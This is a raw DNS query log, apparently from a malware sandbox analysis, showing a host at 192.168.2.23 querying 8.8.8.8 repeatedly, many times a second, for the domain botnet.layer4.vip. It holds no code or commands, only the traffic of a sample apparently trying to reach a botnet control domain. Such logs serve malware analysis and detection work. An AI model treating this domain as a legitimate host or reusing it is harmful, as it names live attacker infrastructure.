                                  Apr 9, 2023 03:31:27.114074945 CEST192.168.2.238.8.8.80x1364Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.138194084 CEST192.168.2.238.8.8.80x1364Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.154160023 CEST192.168.2.238.8.8.80x1364Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.170113087 CEST192.168.2.238.8.8.80x1364Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.185837030 CEST192.168.2.238.8.8.80x1364Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.201601028 CEST192.168.2.238.8.8.80xbf00Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.226147890 CEST192.168.2.238.8.8.80xbf00Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.250668049 CEST192.168.2.238.8.8.80xbf00Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.275120974 CEST192.168.2.238.8.8.80xbf00Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.299647093 CEST192.168.2.238.8.8.80xbf00Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.324731112 CEST192.168.2.238.8.8.80x52cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.340950012 CEST192.168.2.238.8.8.80x52cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.365230083 CEST192.168.2.238.8.8.80x52cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.389530897 CEST192.168.2.238.8.8.80x52cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.405559063 CEST192.168.2.238.8.8.80x52cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.421840906 CEST192.168.2.238.8.8.80x678fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.438096046 CEST192.168.2.238.8.8.80x678fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.454155922 CEST192.168.2.238.8.8.80x678fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.478741884 CEST192.168.2.238.8.8.80x678fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.494904995 CEST192.168.2.238.8.8.80x678fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.510935068 CEST192.168.2.238.8.8.80x29f7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.535634995 CEST192.168.2.238.8.8.80x29f7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.551346064 CEST192.168.2.238.8.8.80x29f7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.575973034 CEST192.168.2.238.8.8.80x29f7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.600389957 CEST192.168.2.238.8.8.80x29f7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.616328955 CEST192.168.2.238.8.8.80x867eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.632057905 CEST192.168.2.238.8.8.80x867eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.656811953 CEST192.168.2.238.8.8.80x867eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.672508955 CEST192.168.2.238.8.8.80x867eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.697019100 CEST192.168.2.238.8.8.80x867eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.721440077 CEST192.168.2.238.8.8.80x72d8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.746067047 CEST192.168.2.238.8.8.80x72d8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.761789083 CEST192.168.2.238.8.8.80x72d8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.786046028 CEST192.168.2.238.8.8.80x72d8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.801661015 CEST192.168.2.238.8.8.80x72d8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.826215029 CEST192.168.2.238.8.8.80x9c80Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.842169046 CEST192.168.2.238.8.8.80x9c80Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.866695881 CEST192.168.2.238.8.8.80x9c80Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.891272068 CEST192.168.2.238.8.8.80x9c80Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.906987906 CEST192.168.2.238.8.8.80x9c80Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.931447029 CEST192.168.2.238.8.8.80x6e11Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.947294950 CEST192.168.2.238.8.8.80x6e11Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.971616030 CEST192.168.2.238.8.8.80x6e11Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.995976925 CEST192.168.2.238.8.8.80x6e11Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.012162924 CEST192.168.2.238.8.8.80x6e11Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.028023958 CEST192.168.2.238.8.8.80xe91aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.044105053 CEST192.168.2.238.8.8.80xe91aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.059931993 CEST192.168.2.238.8.8.80xe91aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.076111078 CEST192.168.2.238.8.8.80xe91aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.101028919 CEST192.168.2.238.8.8.80xe91aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.117095947 CEST192.168.2.238.8.8.80x705aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.141787052 CEST192.168.2.238.8.8.80x705aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.166574955 CEST192.168.2.238.8.8.80x705aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.191401958 CEST192.168.2.238.8.8.80x705aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.207200050 CEST192.168.2.238.8.8.80x705aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.223457098 CEST192.168.2.238.8.8.80x773aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.248255014 CEST192.168.2.238.8.8.80x773aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.273061991 CEST192.168.2.238.8.8.80x773aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.297692060 CEST192.168.2.238.8.8.80x773aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.313615084 CEST192.168.2.238.8.8.80x773aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.338304996 CEST192.168.2.238.8.8.80xccbdStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.354656935 CEST192.168.2.238.8.8.80xccbdStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.370516062 CEST192.168.2.238.8.8.80xccbdStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.395225048 CEST192.168.2.238.8.8.80xccbdStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.411218882 CEST192.168.2.238.8.8.80xccbdStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.427346945 CEST192.168.2.238.8.8.80xff34Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.451534033 CEST192.168.2.238.8.8.80xff34Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.467145920 CEST192.168.2.238.8.8.80xff34Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.491657019 CEST192.168.2.238.8.8.80xff34Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.507292032 CEST192.168.2.238.8.8.80xff34Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.532037020 CEST192.168.2.238.8.8.80x19fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.556328058 CEST192.168.2.238.8.8.80x19fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.580588102 CEST192.168.2.238.8.8.80x19fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.604867935 CEST192.168.2.238.8.8.80x19fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.629229069 CEST192.168.2.238.8.8.80x19fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.653604031 CEST192.168.2.238.8.8.80xd587Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.669415951 CEST192.168.2.238.8.8.80xd587Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.685072899 CEST192.168.2.238.8.8.80xd587Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.710062981 CEST192.168.2.238.8.8.80xd587Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.725714922 CEST192.168.2.238.8.8.80xd587Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.750211000 CEST192.168.2.238.8.8.80xad32Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.774564028 CEST192.168.2.238.8.8.80xad32Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.798574924 CEST192.168.2.238.8.8.80xad32Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.822686911 CEST192.168.2.238.8.8.80xad32Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.847151041 CEST192.168.2.238.8.8.80xad32Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.871577024 CEST192.168.2.238.8.8.80x4b05Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.887336969 CEST192.168.2.238.8.8.80x4b05Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.911298990 CEST192.168.2.238.8.8.80x4b05Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.927118063 CEST192.168.2.238.8.8.80x4b05Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.951181889 CEST192.168.2.238.8.8.80x4b05Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.975626945 CEST192.168.2.238.8.8.80x81b7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.991539955 CEST192.168.2.238.8.8.80x81b7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.015639067 CEST192.168.2.238.8.8.80x81b7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.039802074 CEST192.168.2.238.8.8.80x81b7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.064222097 CEST192.168.2.238.8.8.80x81b7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.080123901 CEST192.168.2.238.8.8.80xa4bcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.095993996 CEST192.168.2.238.8.8.80xa4bcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.120434046 CEST192.168.2.238.8.8.80xa4bcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.135976076 CEST192.168.2.238.8.8.80xa4bcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.160026073 CEST192.168.2.238.8.8.80xa4bcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.175770044 CEST192.168.2.238.8.8.80xd6afStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.200076103 CEST192.168.2.238.8.8.80xd6afStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.216084957 CEST192.168.2.238.8.8.80xd6afStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.240547895 CEST192.168.2.238.8.8.80xd6afStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.256131887 CEST192.168.2.238.8.8.80xd6afStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.280246019 CEST192.168.2.238.8.8.80x885fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.305255890 CEST192.168.2.238.8.8.80x885fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.321160078 CEST192.168.2.238.8.8.80x885fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.345693111 CEST192.168.2.238.8.8.80x885fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.361258984 CEST192.168.2.238.8.8.80x885fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.377043962 CEST192.168.2.238.8.8.80x8dfbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.392919064 CEST192.168.2.238.8.8.80x8dfbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.416920900 CEST192.168.2.238.8.8.80x8dfbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.441330910 CEST192.168.2.238.8.8.80x8dfbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.465447903 CEST192.168.2.238.8.8.80x8dfbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.481069088 CEST192.168.2.238.8.8.80x9974Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.496526003 CEST192.168.2.238.8.8.80x9974Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.512023926 CEST192.168.2.238.8.8.80x9974Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.527882099 CEST192.168.2.238.8.8.80x9974Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.543368101 CEST192.168.2.238.8.8.80x9974Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.559227943 CEST192.168.2.238.8.8.80x3201Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.583250999 CEST192.168.2.238.8.8.80x3201Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.607384920 CEST192.168.2.238.8.8.80x3201Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.631892920 CEST192.168.2.238.8.8.80x3201Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.647857904 CEST192.168.2.238.8.8.80x3201Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.672070980 CEST192.168.2.238.8.8.80xf923Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.696120977 CEST192.168.2.238.8.8.80xf923Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.720331907 CEST192.168.2.238.8.8.80xf923Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.744381905 CEST192.168.2.238.8.8.80xf923Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.760190010 CEST192.168.2.238.8.8.80xf923Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.784797907 CEST192.168.2.238.8.8.80x1521Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.800343990 CEST192.168.2.238.8.8.80x1521Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.824491978 CEST192.168.2.238.8.8.80x1521Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.848648071 CEST192.168.2.238.8.8.80x1521Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.864736080 CEST192.168.2.238.8.8.80x1521Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.889106989 CEST192.168.2.238.8.8.80x17ddStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.913414001 CEST192.168.2.238.8.8.80x17ddStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.929492950 CEST192.168.2.238.8.8.80x17ddStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.954065084 CEST192.168.2.238.8.8.80x17ddStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.978727102 CEST192.168.2.238.8.8.80x17ddStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.003181934 CEST192.168.2.238.8.8.80xb271Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.027853966 CEST192.168.2.238.8.8.80xb271Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.052167892 CEST192.168.2.238.8.8.80xb271Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.076500893 CEST192.168.2.238.8.8.80xb271Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.100919008 CEST192.168.2.238.8.8.80xb271Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.117038012 CEST192.168.2.238.8.8.80x528eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.141328096 CEST192.168.2.238.8.8.80x528eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.157022953 CEST192.168.2.238.8.8.80x528eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.172903061 CEST192.168.2.238.8.8.80x528eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.197433949 CEST192.168.2.238.8.8.80x528eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.221939087 CEST192.168.2.238.8.8.80xf317Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.246053934 CEST192.168.2.238.8.8.80xf317Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.261977911 CEST192.168.2.238.8.8.80xf317Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.286250114 CEST192.168.2.238.8.8.80xf317Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.310806036 CEST192.168.2.238.8.8.80xf317Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.335131884 CEST192.168.2.238.8.8.80xd361Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.351051092 CEST192.168.2.238.8.8.80xd361Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.375314951 CEST192.168.2.238.8.8.80xd361Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.390974045 CEST192.168.2.238.8.8.80xd361Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.406894922 CEST192.168.2.238.8.8.80xd361Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.431534052 CEST192.168.2.238.8.8.80x456eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.447196960 CEST192.168.2.238.8.8.80x456eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.471822977 CEST192.168.2.238.8.8.80x456eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.495899916 CEST192.168.2.238.8.8.80x456eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.511499882 CEST192.168.2.238.8.8.80x456eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.535830021 CEST192.168.2.238.8.8.80x28fcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.551758051 CEST192.168.2.238.8.8.80x28fcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.575984955 CEST192.168.2.238.8.8.80x28fcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.600697994 CEST192.168.2.238.8.8.80x28fcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.616619110 CEST192.168.2.238.8.8.80x28fcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.632541895 CEST192.168.2.238.8.8.80xfc69Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.656725883 CEST192.168.2.238.8.8.80xfc69Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.672386885 CEST192.168.2.238.8.8.80xfc69Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.687947989 CEST192.168.2.238.8.8.80xfc69Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.709867001 CEST192.168.2.238.8.8.80xfc69Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.734328985 CEST192.168.2.238.8.8.80x46d2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.749959946 CEST192.168.2.238.8.8.80x46d2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.774447918 CEST192.168.2.238.8.8.80x46d2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.798662901 CEST192.168.2.238.8.8.80x46d2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.814534903 CEST192.168.2.238.8.8.80x46d2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.838965893 CEST192.168.2.238.8.8.80xa1ceStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.854669094 CEST192.168.2.238.8.8.80xa1ceStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.870244026 CEST192.168.2.238.8.8.80xa1ceStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.894754887 CEST192.168.2.238.8.8.80xa1ceStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.919039011 CEST192.168.2.238.8.8.80xa1ceStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.943825960 CEST192.168.2.238.8.8.80xa1daStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.968322039 CEST192.168.2.238.8.8.80xa1daStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.992487907 CEST192.168.2.238.8.8.80xa1daStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.008019924 CEST192.168.2.238.8.8.80xa1daStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.023485899 CEST192.168.2.238.8.8.80xa1daStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.047550917 CEST192.168.2.238.8.8.80xa59dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.063061953 CEST192.168.2.238.8.8.80xa59dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.078561068 CEST192.168.2.238.8.8.80xa59dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.102534056 CEST192.168.2.238.8.8.80xa59dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.126633883 CEST192.168.2.238.8.8.80xa59dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.142565012 CEST192.168.2.238.8.8.80x36b1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.167062998 CEST192.168.2.238.8.8.80x36b1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.191119909 CEST192.168.2.238.8.8.80x36b1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
